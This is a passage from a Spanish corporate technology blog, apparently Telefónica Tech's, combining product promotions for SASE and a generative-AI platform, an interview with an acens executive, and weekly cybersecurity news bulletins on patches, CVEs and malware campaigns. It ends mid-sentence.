Sergio de los Santos, NACHO PALOU — Ciberseguridad IA & Data Project Zero, descubrimiento de vulnerabilidades usando modelos LLM 20 de noviembre de 2024
12 de febrero de 2025
Conoce nuestra solución SASE para la seguridad y gestión de redes
A menudo las organizaciones enfrentan el desafío de implementar soluciones de red y TI que garanticen el cumplimiento de los máximos requisitos de seguridad y eficiencia, para mantener la competitividad. Para responder a estas necesidades, nuestra propuesta SASE (Secure Access Service Edge) de Telefónica Tech ofrece una solución tecnológica con un modelo de gestión convergente que unifica la gestión de la red y la seguridad bajo un enfoque centralizado y eficiente. Una solución convergente para una seguridad integral La convergencia de estos elementos permite tener una visibilidad completa a través de todos los componentes de la infraestructura, facilitando así una respuesta rápida y eficaz a cualquier incidente que pueda surgir. La capacidad de actuar de manera ágil en cualquier punto de la cadena es fundamental para minimizar riesgos y mantener la continuidad operativa. Además, la sincronización entre la seguridad y la red asegura que cualquier cambio en la infraestructura no comprometa la protección de la organización. Este enfoque integral es clave para evaluar el impacto de los cambios y asegurar una adaptación sin riesgos, beneficiando tanto a los activos dentro del perímetro de la red como a aquellos en la nube (IaaS o SaaS). Esta solución optimiza los recursos y consigue eficiencias de costes para un mejor retorno de la inversión para las empresas. Esta visión integral de la seguridad corporativa es clave para prevenir brechas de seguridad. Contar con un único servicio que centraliza el control garantiza el acceso seguro a los recursos organizacionales, tanto internos como externos, permite mantener la integridad y la seguridad de toda la infraestructura de la empresa. Principales beneficios de nuestro modelo de gestión convergente Nuestro modelo de gestión convergente de Telefónica Tech optimiza la eficiencia y la seguridad de las infraestructuras empresariales y representa una solución avanzada y competitiva con importantes beneficios: 1. Respuesta más rápida y eficaz a incidentes El modelo de gestión convergente permite tener una visibilidad completa a través de todos los elementos de red y seguridad, facilitando la identificación y resolución de incidentes de manera más ágil. ■ La capacidad de actuar rápidamente sobre cualquier punto de la cadena es fundamental para minimizar riesgos y mantener la continuidad operativa. 2. Seguridad y red sincronizadas, sin riesgos Uno de los mayores retos en la gestión de infraestructuras es garantizar que los cambios en la red no comprometan la seguridad, y viceversa. ■ Este modelo permite evaluar el impacto de cualquier cambio en todos los elementos de la cadena de comunicación, contribuyendo a una adaptación fluida y minimizando riesgos. 3. Una oferta unificada y más competitiva En lugar de negociar con múltiples proveedores para cada elemento de la cadena tecnológica, desde Telefónica Tech ofrecemos una solución unificada que consigue eficiencias de costes y simplifica la gestión. ■ Esto no solo optimiza los recursos, sino que también mejora el retorno de la inversión. 4. Visión integral de la seguridad corporativa Este enfoque proporciona un único servicio para robustecer el acceso seguro a los recursos de la organización, desde dentro y fuera de la red corporativa, y tanto para los activos situados dentro del perímetro de red como los que están en la nube (IaaS o SaaS). ■ Esta visión integral es clave para prevenir brechas de seguridad y garantizar un control total de la organización. 5. Informes adaptados a todos los niveles El reto en la toma de decisiones de una compañía es que los niveles gerenciales dispongan de la información adecuada para tomarlas. La elaboración de informes unificados y adaptados a diferentes niveles gerenciales es clave en este proceso. ■ Con el modelo SASE, cada área de la organización puede obtener la información relevante de manera clara y precisa, optimizando la estrategia empresarial. 6. KPI y acuerdos de nivel de servicio (SLA) garantizados La gestión unificada bajo un único paraguas contribuye a que los indicadores de rendimiento (KPI) y los acuerdos de nivel de servicio (SLA) se cumplan consistentemente. ■ Esto propicia un soporte homogéneo que se traduce en una experiencia más confiable para el cliente. 7. Identificación eficiente de problemas Gracias al equipo de expertos coordinado y altamente capacitados en múltiples tecnologías de SASE, este modelo mejora la eficiencia en la detección y resolución de problemas de red y seguridad. ■ La gestión unificada de las tecnologías también asegura que las soluciones implementadas sean coherentes y efectivas extremo a extremo. 8. Un único punto de contacto para el cliente La centralización de los canales de información permite que los datos estén organizados y sean confiables, evitando errores por descoordinación o falta de información. ■ Tener un punto único de contacto simplifica enormemente la gestión para que se tomen las mejores decisiones de manera ágil y fundamentada. Conclusión Nuestro modelo de gestión convergente SASE de Telefónica Tech mejora la seguridad y el rendimiento de las redes empresariales, y también optimiza los procesos internos, simplifica la gestión y aumenta la competitividad. La adopción de este sistema permite a las empresas adaptarse rápidamente a los cambios del mercado, garantizando un alto nivel de eficiencia y confiabilidad. Además, la capacidad de tener un único punto de contacto y una gestión centralizada reduce los tiempos de respuesta y mejora la toma de decisiones fundamentadas. Con su enfoque integral y personalizado, la implementación del modelo SASE de Telefónica Tech es una inversión estratégica que asegura la protección y optimización de los recursos tecnológicos, contribuyendo al éxito continuo de las empresas.
10 de febrero de 2025
Maximiza el poder de tus datos con IA Generativa: cinco enfoques clave
Aunque la IA lleva décadas transformando la tecnología, la IA Generativa se ha posicionado como un avance disruptivo. Esta tecnología no se limita a analizar datos o editar documentos; tiene la capacidad de crear contenido nuevo, como texto, imágenes, videos, música, voces, datos y código de programación. Su capacidad para reinventar procesos y ofrecer soluciones creativas coloca a esta tecnología en el centro de la transformación digital moderna. La eficacia de la IA Generativa depende en gran medida de la calidad y relevancia de los datos, consolidándose como el pilar fundamental para el progreso tecnológico. Una implementación adecuada puede redefinir industrias enteras, potenciando la innovación, la creatividad y la eficiencia de formas sin precedentes. Su aplicación abarca desde el diseño de estrategias personalizadas hasta la automatización de tareas que antes requerían más tiempo y recursos. Implementada correctamente, la IA Generativa puede transformar industrias al impulsar la innovación, creatividad y eficiencia. A continuación proponemos cinco enfoques para integrar la IA Generativa en los datos de tu empresa para aprovechar al máximo todas las oportunidades: 1. IA Generativa para desbloquear el valor de los datos Se calcula que solo el 10% de los datos empresariales son accesibles y aprovechables. Esto se debe a que muchas organizaciones enfrentan desafíos al gestionar grandes volúmenes de datos no estructurados. Sin embargo, la IA Generativa ha simplificado este proceso al permitir a las empresas utilizar modelos preentrenados para extraer conocimientos valiosos de datos dispersos, adaptándolos a necesidades específicas y personalizadas. A pesar de las inversiones en infraestructuras de datos modernas, las bases de datos empresariales siguen estando compartimentadas en silos. Esto dificulta el acceso eficiente para el entrenamiento de sistemas de modelos de lenguaje (LLM, por sus siglas en inglés), limitando el alcance y la eficacia de las soluciones tecnológicas. ■ Unificar los datos almacenados en distintas plataformas, especialmente en la nube, asegura la calidad y accesibilidad necesarias para que la IA Generativa sea un éxito. La consolidación de datos permite también el desarrollo de insights más precisos y estrategias empresariales optimizadas. 2. Potenciar los modelos LLM con semántica que promueva la comprensión y el aprendizaje Una aplicación común de la IA Generativa es la creación de chatbots avanzados. Cada vez son más las empresas que incorporar interfaces para atender consultas y mejorar la experiencia del cliente. Sin embargo, uno de los principales desafíos es lograr una interpretación precisa de la terminología comercial y alinear las métricas empresariales para garantizar el cumplimiento de los objetivos. Las soluciones basadas en semántica y chatbots contextuales pueden transformar la forma en que las empresas acceden a la inteligencia comercial. Estas herramientas permiten mejorar la comprensión de los datos, simplificar el acceso a información clave y ofrecer respuestas adaptadas al contexto de cada usuario o situación. ■ Al combinar tecnologías semánticas con modelos de lenguaje LLM, las empresas pueden avanzar hacia una mayor personalización, mejorando tanto la eficiencia operativa como la satisfacción del cliente. 3. Enriquecer el potencial humano con IA Generativa La IA Generativa impactará funciones tradicionales como marketing y finanzas, y también abrirá nuevas posibilidades en áreas como recursos humanos, administración de oficinas y especialmente ingeniería de software. Estas capacidades permiten reimaginar el trabajo cotidiano, eliminando barreras operativas y liberando tiempo para tareas más estratégicas. En este ámbito, la IA Generativa revolucionará la interacción con sistemas complejos, permitiendo generar código de manera más eficiente, automatizar tareas técnicas y facilitar la interoperabilidad entre sistemas. Por ejemplo, los desarrolladores podrán utilizar IA Generativa para crear prototipos de software en cuestión de minutos, optimizando así el tiempo de desarrollo. ■ Al liberar a los profesionales de tareas repetitivas y rutinarias, la IA Generativa fomentará la creatividad, la innovación y la resolución estratégica de problemas, potenciando la competitividad empresarial. Además, su implementación en áreas como la capacitación del personal y el análisis de datos puede redefinir la manera en que las empresas gestionan sus equipos y operaciones. 4. Adoptar la IA a gran escala con automatización Según Gartner, se espera que más del 80% de las empresas hayan implementado IA Generativa en entornos de producción para 2026, en comparación con menos del 5% en 2023. Este rápido crecimiento resalta el potencial de la IA Generativa para transformar procesos clave en sectores como manufactura, salud, retail y servicios financieros. Sin embargo, la verdadera transformación no radica únicamente en construir chatbots, sino en integrar la IA Generativa en los procesos comerciales fundamentales. Esto implica utilizarla para automatizar cadenas de suministro, mejorar la toma de decisiones y desarrollar productos o servicios más personalizados. Además, la capacidad de estas soluciones para integrarse con otras tecnologías, como IoT y Ciberseguridad, puede ampliar aún más su impacto y alcance. ■ Las soluciones de IA Generativa deben ir más allá de la interacción básica y ser capaces de analizar datos, tomar decisiones estratégicas y adaptarse rápidamente a los cambios del entorno. La combinación de automatización e IA Generativa permite escalar la eficiencia, ofreciendo a las empresas una ventaja competitiva significativa. 5. Reimaginar el talento de tus equipos en la era de la IA Aunque la demanda de profesionales en datos y análisis continúa creciendo, la IA Generativa introduce la necesidad de nuevas habilidades y roles especializados. Estos incluyen ingenieros de IA para gestionar modelos y datos, expertos en ética de IA para abordar sesgos y privacidad, y optimizadores de IA para garantizar un rendimiento eficiente. Con el avance de esta tecnología, también surgirán nuevos roles, como "entrenadores de IA" para personalizar modelos en sectores específicos, y especialistas en "creatividad aumentada", quienes combinarán conocimientos técnicos con creatividad humana para desarrollar soluciones innovadoras. ■ Las soluciones de IA Generativa deben respaldar estos roles y también automatizar ciertas tareas, permitiendo a los profesionales centrarse en actividades estratégicas de mayor valor. Esto incluye la capacidad de simplificar procesos de onboarding, reducir errores en tareas manuales y mejorar la colaboración entre equipos. Nuestra propuesta GenAI Platform, de Telefónica Tech Nuestra solución GenAI Platform, que hemos creado con Altostratus, part of Telefónica Tech, permite a las organizaciones crear asistentes virtuales personalizados que optimicen los procesos internos, impulsen la transformación digital y mejoren la experiencia del cliente. Esta herramienta se integra de manera rápida y sencilla en los procesos de negocio, sin necesidad de configuraciones específicas, lo que facilita su adopción a gran escala. Los asistentes virtuales que se pueden crear con nuestra plataforma automatizan las tareas tediosas y permiten a los trabajadores enfocarse en tareas de mayor valor. Además, la plataforma es agnóstica, escalable y segura, permitiendo a las empresas aprovechar las capacidades de la IA Generativa independientemente de su nivel técnico. De este modo, GenAI Platform de Telefónica Tech busca popularizar el uso de asistentes virtuales personalizados, haciendo que las empresas sean más eficientes y resilientes. Con esta solución, las organizaciones pueden transformar sus operaciones y mantener una ventaja competitiva en un entorno empresarial cada vez más dinámico. Integración y beneficios de GenAI Platform En Telefónica Tech, creemos que la incorporación de la IA Generativa no solo debe limitarse a la creación de chatbots, sino que debe integrarse de forma profunda en los procesos comerciales clave para lograr una verdadera transformación digital. Nuestra GenAI Platform está diseñada para analizar grandes volúmenes de datos, tomar decisiones informadas y adaptarse rápidamente a los cambios del entorno, combinando automatización e inteligencia generativa. Esta plataforma mejora la eficiencia operativa e impulsa la innovación al liberar a los profesionales de tareas rutinarias, permitiéndoles centrarse en iniciativas más estratégicas. Además, proporciona herramientas avanzadas para gestionar la privacidad y los sesgos, asegurando que las soluciones de IA sean éticas y responsables. De este modo, las empresas pueden contar con una solución robusta y flexible que se adapta a sus necesidades específicas y en cumplimiento con el Reglamento Europeo de Inteligencia Artificial (RIA). Esta solución también fomenta la colaboración entre diferentes equipos, permitiendo una implementación más cohesiva y fluida de la IA en toda la organización. GenAI Platform de Telefónica Tech representa una herramienta de automatización avanzada. Esta hiperautomatización es un pilar fundamental para la evolución tecnológica y competitiva de las empresas, y las prepara para los retos futuros potenciando su capacidad de innovación y liderazgo en el mercado. La IA Generativa es un catalizador que redefine la forma en que las empresas innovan, operan y compiten. Conclusión La IA Generativa no es solo una herramienta tecnológica. Es un catalizador que redefine la forma en que las empresas innovan, operan y compiten. Con la adopción de enfoques estratégicos y centrados en datos las empresas pueden desbloquear todo el potencial de esta tecnología que evoluciona la transformación digital. Desde la mejora de la eficiencia hasta la creación de nuevos mercados, la IA Generativa está llamada a ser un motor clave del cambio en los próximos años. Aquellas empresas que adopten esta tecnología y desarrollen estrategias adaptativas estarán mejor preparadas para crecer en un entorno cada vez más digital y competitivo.
5 de febrero de 2025
Boletín Semanal de Ciberseguridad, 25 - 31 enero
Apple corrige múltiples vulnerabilidades, incluido un 0-day activamente explotado Apple ha lanzado actualizaciones de seguridad para solucionar diversas vulnerabilidades en visionOS, iOS, iPadOS, macOS (Sequoia, Sonoma, Ventura), watchOS, tvOS y Safari. Entre los fallos corregidos destaca un 0-day, identificado como CVE-2025-24085, activamente explotado en ataques dirigidos. Este fallo, ubicado en el marco Core Media, permite la escalada de privilegios a través de aplicaciones maliciosas. Según Apple, las versiones anteriores a iOS 17.2 son las más afectadas. La vulnerabilidad ha sido mitigada mediante mejoras en la gestión de memoria en iOS 18.3, iPadOS 18.3, macOS Sequoia 15.3, watchOS 11.3, visionOS 2.3 y tvOS 18.3. Los dispositivos impactados incluyen iPhone XS y posteriores, varias generaciones de iPad, Apple Watch Series 6 y modelos más recientes, así como Apple TV. Apple recomienda instalar las actualizaciones cuanto antes para reducir posibles riesgos. Más info Elusión de WAF y fallos en API conducen a acceso administrativo total Se han detectado fallos críticos en una organización, logrando acceso a 3 000 empresas subsidiarias. La explotación de fallos en API permitió la exposición de datos sensibles de empleados y clientes. Los investigadores intentaron utilizar el método traversal pero, un Web Application Firewall (WAF) les bloqueó inicialmente el acceso. Sin embargo, un dominio de producción les permitió eludirlo. Además, a través de fuzzing, identificaron un endpoint crítico vinculado a microservicios de pagos, extrayendo PII y datos financieros. También obtuvieron acceso a un panel administrativo mediante enumeración de usuarios y fuerza bruta, eludiendo verificaciones KYC y facilitando el robo de identidad. Asimismo, un fallo en la normalización de solicitudes les permitió eludir autenticaciones backend. Más info Identificada una campaña maliciosa de distribución de TorNet Cisco Talos ha identificado una campaña activa desde mediados de 2024 con motivaciones financieras y destinada al despliegue del backdoor TorNet. Los ataques se dirigen principalmente a usuarios de Polonia y Alemania a través de correos electrónicos de phishing con archivos adjuntos maliciosos que simulan ser comunicaciones logísticas o financieras, empleando el malware PureCrypter como mecanismo de entrega. Una vez ejecutado, PureCrypter descifra y carga TorNet directamente en la memoria, eludiendo los sistemas tradicionales de detección e incluyendo payloads adicionales, como Agent Tesla y Snake Keylogger. En adición, los atacantes desconectan la máquina de la víctima de la red durante el despliegue de la carga útil. TorNet establece conexiones con servidores C2 a través de la red TOR, mientras que PureCrypter modifica la configuración del sistema, crea tareas programadas y tiene en cuenta las limitaciones de energía del dispositivo. Más info Rockwell Automation corrige fallos en algunos de sus productos Rockwell Automation publicó avisos de seguridad sobre seis fallas críticas y altas en sus productos FactoryTalk y DataMosaix. En FactoryTalk, corrigió fallos en View Machine Edition y View Site Edition, algunos explotables remotamente para ejecución de comandos. Entre estos destaca el CVE-2025-24480, CVSSv3 9.8 según fabricante, producido debido a la falta de saneamiento de entrada y que podría permitir a un atacante remoto ejecutar comandos o código con privilegios altos. DataMosaix Private Cloud tenía un fallo crítico en SQLite (CVE-2020-11656, CVSSv3 9.8) y un path traversal que exponía información sensible (CVE-2025-0659). También se corrigió una vulnerabilidad DoS en KEPServer, descubierta en Pwn2Own 2023. El fabricante afirma que no hay evidencia de explotación, pero insta a aplicar parches debido al riesgo en sistemas industriales. Asimismo, CISA ha emitido recomendaciones para algunas de estas vulnerabilidades. Más info Lazarus Group utiliza un panel de administración para controlar ciberataques globales Investigadores de SecurityScorecard han observado que Lazarus Group estaría utilizando una plataforma administrativa basada en web para supervisar su infraestructura de mando y control (C2) y todos los aspectos de sus campañas de forma centralizada. Cada servidor C2 alojaba una plataforma construida con una aplicación React y una API Node.js. Se trataría, pues, de un sistema integral que permite al grupo organizar y gestionar los datos exfiltrados, mantener la supervisión de hosts comprometidos y manejar la entrega de la carga útil. El hallazgo se ha producido en relación con una campaña de ataque a la cadena de suministro denominada Operation Phantom Circuit dirigida al sector de criptomonedas y desarrolladores de todo el mundo con versiones troyanizadas de paquetes de software legítimos que albergan backdoors. La campaña, activa entre septiembre de 2024 y enero de 2025, tuvo 1 639 víctimas en total, la mayoría en Brasil, Francia e India. Se sospecha que la plataforma se ha usado en todas las campañas de la amenaza “IT Worker”. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
31 de enero de 2025
“Conocemos muy bien el entorno y las necesidades de digitalización de las pymes.” Vicente Hernández, acens
Háblanos de ti: quién eres, qué haces y cómo llegaste a tu posición actual Mi interés por la informática surgió gracias a mi padre. Él era ingeniero civil y adquirió un Commodore 64 para su uso profesional, que acabé utilizando yo. A los 7 u 8 años comencé a programar en BASIC con este Commodore 64 y con 13 años programaba en C con Borland Turbo C en un clónico 386. Luego inicié mis estudios en ingeniería informática y en el tercer curso de la carrera, de forma casual y por afición, fundé junto a unos amigos Veloxia Network, una empresa de servicios de hosting y registro de dominios. Desarrollamos un panel de control distribuido muy novedoso por aquellos tiempos al contar con unos procesos de alta automatizada e inmediata de los clientes desde la web. Quise aprender programación en cuanto mi padre me dijo que si sabía programar podría desarrollar mis propios videojuegos. El mercado creció rápidamente y nuestra demanda superó nuestra capacidad de aprovisionamiento. Veloxia fue adquirida por acens en el año 2008 y, aunque dejé la compañía, a los 2 años me trasladé a Madrid y tuve la oportunidad de unirme al departamento de preventa como ingeniero. Con el tiempo asumí el liderazgo de dicho departamento, que en acens está estrechamente vinculado al área comercial, y recientemente he asumido la dirección comercial de acens. acens cuenta con una trayectoria de más de 25 años y desde 2021 es parte de Telefónica Tech. ¿Cómo has vivido esa evolución y crecimiento? Ha sido un proceso de aprendizaje intenso. Durante los primeros años fuimos algo fuera de lo común en el ámbito de TI. Sin embargo en poco tiempo la transformación de las ventas en el Grupo Telefónica ha sido notable, con un cambio significativo hacia los servicios de TI, impulsado por la transformación global del Grupo y en especial por la evolución de su fuerza de ventas, posiblemente la mayor de España. En diciembre de 2024 Vicente asumió la dirección comercial de acens, part of Telefónica Tech. ¿Qué representa para nuestros clientes que acens sea parte Telefónica Tech? Es una garantía de fiabilidad y de calidad por nuestra capacidad para ofrecer soluciones integrales y personalizadas en áreas avanzadas como conectividad, Ciberseguridad, Big Data, IA o gestión en la nube, y por la atención y acompañamiento que ofrecemos a nuestros clientes Además, la inversión constante en innovación, aunque menos visible para el cliente, es esencial. Contamos con equipos dedicados al desarrollo y mejora continua de productos y servicios, lo que nos permite fortalecer nuestro porfolio de soluciones y anticiparnos a las necesidades del mercado. En tu nueva etapa, ¿cuáles son tus principales desafíos? La adaptación al puesto implica un cambio significativo en el tipo y nivel de interlocución, así como la gestión de la delegación de responsabilidades dentro de mi equipo. Como principal desafío destacaría el de definir con claridad qué servicios y productos tenemos que ofrecer para dar soluciones a nuestros clientes, quienes confían en nosotros para guiar su transformación digital. Es fundamental entender y anticipar sus necesidades y acompañarlos en cada paso del proceso, desde la identificación de soluciones hasta la implementación y el soporte continuado, demostrando nuestro compromiso con su éxito a largo plazo. Ofrecemos a las pymes agilidad y soluciones ajustadas, tanto en términos de coste como en dimensionamiento. ¿Cómo ha evolucionado la nube? ¿Pensaste en tus inicios que llegaría a tener un impacto tan significativo? Cuando empecé en Veloxia no imaginaba cómo la virtualización agilizaría la externalización de servicios TI. Inicialmente nos enfocábamos en infraestructura para páginas web, y en cambio hoy trabajamos principalmente con infraestructura de negocio para nuestros clientes. ¿Cómo evalúas el estado actual de la nube en España y cuál crees que será su impacto en los próximos 20 años? El estado actual de la nube en España muestra un crecimiento robusto y sostenido, impulsado principalmente por las necesidades crecientes de seguridad y la reducción en inversiones en infraestructuras locales. Este cambio ha permitido que las pymes españolas superen las barreras tradicionales y adopten soluciones en la nube, facilitando un crecimiento superior al 20% anual. El estado actual de la nube en España muestra un crecimiento robusto y sostenido, impulsado principalmente por las necesidades crecientes de seguridad y reducción de costes. En los próximos 20 años la tecnología en la nube seguirá evolucionando y la capacidad de computación se incrementará significativamente, posibilitando avances que hoy no somos capaces de concebir. Podríamos ver el surgimiento de la Inteligencia Artificial General (AGI), lo cual sería un cambio disruptivo para la humanidad. La AGI transformaría nuestra sociedad de formas inimaginables, abriendo nuevas oportunidades y desafíos para las empresas y la tecnología en general. Como lector asiduo de ciencia-ficción pienso que cualquier futuro es posible. ¿Cuál es nuestro compromiso con las empresas a las que ayudamos en su viaje a la nube? En acens conocemos muy bien el entorno y necesidades de transformación digital de las pymes. Nuestra propuesta ofrece a la pyme no sólo agilidad sino soluciones ajustadas tanto en términos de coste como en dimensionamiento. Desde 2021 acens es parte de Telefónica Tech. La relación con muchos de nuestros clientes se remonta a más de una década. Han evolucionado y crecido con nosotros afrontando juntos varios cambios de tecnología, y hoy continúan confiando en nosotros para seguir avanzando en su transformación IT. Además, las capacidades y tecnologías avanzadas de Telefónica Tech nos permiten ofrecer herramientas adicionales para que nuestros clientes sigan siendo eficientes y competitivos. Conocemos muy bien el entorno y necesidades de transformación digital de las pymes. ¿Qué aspecto diferencial destacarías de nuestra propuesta? Lo que realmente nos diferencia en acens es el servicio. Existen muchas empresas que venden infraestructura Cloud en el mercado, pero lo que nos diferencia en acens es cómo respondemos y apoyamos a nuestros clientes cuando tienen problemas o dificultades. ¿Y algún logro profesional del que estés especialmente orgulloso? Me siento especialmente orgulloso del desarrollo de mi equipo. A pesar de que mi objetivo formal sea alcanzar unos objetivos de venta, sé que sólo puedo lograrlo con un equipo capaz de hacerlo realidad. Ver cómo cada miembro del equipo crece, aprende y perfecciona su labor es uno de los logros más gratificantes de mi carrera. Tenemos una enorme capacidad para ofrecer soluciones a medida que el cliente a menudo desconoce que existen.
30 de enero de 2025
Boletín Semanal de Ciberseguridad, 18-24 enero
Oracle parchea más de 300 vulnerabilidades, múltiples de ellas críticas Oracle ha parcheado 318 vulnerabilidades de seguridad en el Critical Patch Update Advisory de enero. De entre los productos que habrían recibido actualizaciones, Oracle Communications fue en el que más vulnerabilidades fueron parcheadas, un total de 85. Sin embargo, el fallo de mayor severidad afecta a Oracle Agile Product Lifecycle Management (PLM) Framework, ha sido denominado CVE-2025-21556 y tendría un CVSSv3 de 9.9. Es una vulnerabilidad fácilmente explotable por un atacante con pocos privilegios y acceso a la red a través de HTTP que permitiría la toma de control del software. Asimismo, otras vulnerabilidades de severidad crítica han sido corregidas en este parche, incluyendo CVE-2025-21524 y CVE-2023-3961, ambas con CVSSv3 9.8 según Oracle y que afectarían a JD Edwards EnterpriseOne Tools. El proveedor insta a actualizar a la última versión de los productos afectados. Más info Nuevas campañas de atacantes haciéndose pasar por soporte de Microsoft Investigadores de Sophos han observado a los actores de amenazas STAC5143 y STAC5777, con conexiones a FIN7, haciéndose pasar por el soporte técnico de Microsoft Teams para engañar a empleados, robar datos y desplegar ransomware en redes corporativas. Los atacantes aprovechan la configuración por defecto de Teams, comenzando la cadena de infección con el envío de correos de phishing. Tras esto, el objetivo recibe una llamada externa y se le convence para establecer una sesión de control remoto de pantalla a través de Teams. Después, el atacante deja caer un archivo Java y scripts Python (RPivot backdoor) alojados en un enlace externo de SharePoint para descargar un ejecutable legítimo de ProtonVPN, el cual carga lateralmente una DLL maliciosa que crea un canal C2 cifrado, proporcionando acceso remoto al dispositivo. Más info Murdoc Botnet se dirige a dispositivos IoT para realizar ataques DDoS Investigadores de Qualys han advertido de una nueva campaña a gran escala que aprovecha fallos de seguridad de los routers Huawei HG532 y las cámaras IP AVTECH para integrar los dispositivos en Murdoc Botnet, una variante de Mirai. La campaña está activa desde al menos julio de 2024, con más de 1 370 sistemas infectados, localizándose la mayoría de las infecciones en Malasia, México, Tailandia, Indonesia y Vietnam. La botnet aprovecha vulnerabilidades como CVE-2017-17215 y CVE-2024-7029 para obtener acceso inicial a los dispositivos IoT y descargar la carga útil de la siguiente fase mediante un script de shell. Este, por su parte, obtiene el malware de la botnet, ejecutándolo en función de la arquitectura de la CPU. El objetivo final es utilizar la botnet para llevar a cabo ataques DDoS. Más info Publicado un exploit PoC de una vulnerabilidad de QNAP El usuario de GitHub C411e ha publicado un nuevo exploit para la vulnerabilidad CVE-2024-53691, CVSSv4 8.7 según proveedor, que habría sido reportada en abril de 2024. Este fallo afecta a los sistemas operativos QTS y QuTS Hero de QNAP y permitiría a un atacante remoto acceder al sistema de archivos y ejecutar código arbitrario en los dispositivos afectados. El exploit PoC publicado recientemente divide la explotación de CVE-2024-53691 en varios pasos: primero el atacante crea un link symlink que dirige a un archivo sensible, seguidamente, el symlink se comprime en un archivo ZIP y es subido al dispositivo QNAP mediante la interfaz web. Tras esto, se crea una payload que contendría una reverse shell, permitiendo al atacante establecer una conexión remota con el sistema y escalar sus privilegios hasta convertirse en administrador. Los parches para solucionar esta vulnerabilidad fueron publicados en septiembre de 2024. Más info Nueva campaña de ValleyRAT dirigida a usuarios de habla china Investigadores de Intezer Labs han detectado una nueva campaña de ciberataques del troyano de acceso remoto ValleyRAT dirigidos a regiones de habla china, destacando Hong Kong, Taiwán y China. Los ataques comienzan con páginas de phishing a través de las cuales los usuarios descargan un paquete malicioso Microsoft Installer (MSI) que simula ser software legítimo. Una vez ejecutado, el instalador despliega una aplicación benigna para evitar sospechas, mientras que extrae sigilosamente un archivo cifrado con la carga útil del malware. ValleyRAT es distribuido mediante un cargador en varias fases denominado PNGPlug, siendo su objetivo principal preparar el entorno para la ejecución del malware principal y establecer persistencia en el mismo. Por su parte, el paquete MSI utiliza la función CustomAction del instalador de Windows para ejecutar código malicioso, empleando una contraseña codificada 'hello202411' para extraer los componentes principales del malware. ValleyRAT, detectado en 2023, proporciona acceso no autorizado y control sobre las máquinas infectadas, siendo asociado al actor de amenazas Silver Fox. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
24 de enero de 2025
Boletín Semanal de Ciberseguridad, 11-17 enero
Microsoft parchea más de 150 vulnerabilidades, incluyendo tres 0-day explotadas activamente En el contexto del Patch Tuesday de enero, Microsoft ha publicado nuevas actualizaciones que parchean 159 vulnerabilidades, de las cuales 12 serían críticas, 8 serían consideradas 0-day y 3 de ellas habrían sido explotadas activamente en ataques. En concreto, CVE-2025-21333 (CVSSv3 7.8 según Microsoft), CVE-2025-21334 (CVSSv3 7.8 según Microsoft) y CVE-2025-21335 (CVSSv3 7.8 según Microsoft) serían los tres fallos de elevación de privilegios empleados en ataques y afectarían a la integración del kernel de Windows Hyper-V NT VSP. Microsoft no ha ofrecido más detalles acerca de la explotación de las tres 0-day. Asimismo, en este Patch Tuesday se habrían parcheado diversos fallos de elusión de funciones de seguridad, RCE, divulgación de información, DoS y spoofing. Por otro lado, Citrix ha lanzado un nuevo boletín de seguridad en el que informa de que algunas de las nuevas actualizaciones de Windows pueden fallar si Citrix Session Recording Agent (SRA) versión 2411 está instalado en el dispositivo, por lo que han ofrecido una mitigación temporal mientras resuelven el problema. Más info SAP aborda vulnerabilidades críticas en NetWeaver y otras plataformas en su Patch Day de enero SAP ha publicado 14 notas de seguridad en su Patch Day de enero 2025, destacando dos vulnerabilidades críticas en NetWeaver AS para ABAP y ABAP Platform (CVE-2025-0070 y CVE-2025-0066), ambas con una puntuación CVSSv3 de 9.9 según fabricante. CVE-2025-0070 describe un fallo de autenticación incorrecta que permite el robo de credenciales mediante comunicación RFC interna, comprometiendo confidencialidad, integridad y disponibilidad. Mientras que CVE-2025-0066 expone credenciales descifradas en texto plano, facilitando ataques. También corrigieron una vulnerabilidad de inyección SQL de alta gravedad en NetWeaver, CVE-2025-0063 CVSSv3 8.8 según SAP, que podría permitir el acceso a la base de datos Informix. Además, se solucionaron fallos graves en BusinessObjects y un problema de secuestro de DLL en SAPSetup. El resto de las correcciones abarcan vulnerabilidades medias y bajas en Business Workflow, NetWeaver y otras plataformas. Aunque no hay evidencia de explotación activa, SAP insta a aplicar los parches rápidamente. Más info Filtrados los datos de más de 15 000 dispositivos FortiGate en la dark web Un nuevo grupo de actores malicioso, llamado Grupo Belsen, filtró en la dark web información sensible de más de 15 000 dispositivos FortiGate, incluyendo archivos de configuración, direcciones IP y credenciales VPN. Esta filtración, de 1.6 GB, está organizada por países y expone detalles como contraseñas (algunas en texto plano), claves privadas y reglas de cortafuegos. El grupo, que apareció este mes, utilizó esta fuga como su primera operación oficial para promocionarse, liberando los datos en un popular sitio web de Tor. Según el investigador Kevin Beaumont, los datos filtrados están vinculados a la explotación del 0-day CVE-2022-40684, CVSSv3 9.8, documentada en ataques de 2022 antes de que se publicara una solución. Beaumont verificó que las contraseñas y configuraciones coinciden con dispositivos comprometidos, y señaló que los datos se recopilaron en octubre de 2022. La mayoría de los dispositivos afectados ejecutaban firmware FortiOS entre las versiones 7.0.0 y 7.2.2, aunque esta última corrigió el fallo. Sin embargo, no se explica cómo fueron vulnerados dispositivos con versiones parcheadas. Pese al tiempo transcurrido, la filtración sigue exponiendo información crítica sobre las defensas de las redes afectadas. Más info FBI fuerza al malware PlugX a usar el comando de autoeliminación El Departamento de Justicia de EE.UU. y el FBI han anunciado una operación internacional que ha eliminado el malware PlugX, vinculado a China, de 4258 dispositivos infectados en Estados Unidos. La operación fue llevada a cabo en colaboración con socios internacionales, incluyendo la policía francesa y la empresa de ciberseguridad Sekoia. La operación se completó gracias a que se descubrió que PlugX incluye un comando nativo de autoeliminación y se pudo ejecutar desde el servidor C2. PlugX, desarrollado por el actor de amenazas Mustang Panda, fue utilizado para infiltrarse, controlar y robar información de víctimas que varían desde gobiernos europeos o asiáticos, además de los sistemas gubernamentales estadounidenses citados previamente, a empresas navieras europeas. Más info Ataques de ransomware a través de buckets AWS Investigadores de Halcyon RISE Team han advertido de que un actor de amenazas llamado Codefinger ha encontrado una manera de usar una característica de Amazon Web Services (AWS) para cifrar datos en los buckets S3 de sus víctimas. AWS ofrece una opción de cifrado llamada “Server-Side Encryption with Customer Provided Keys (SSE-C)”, que permite a los 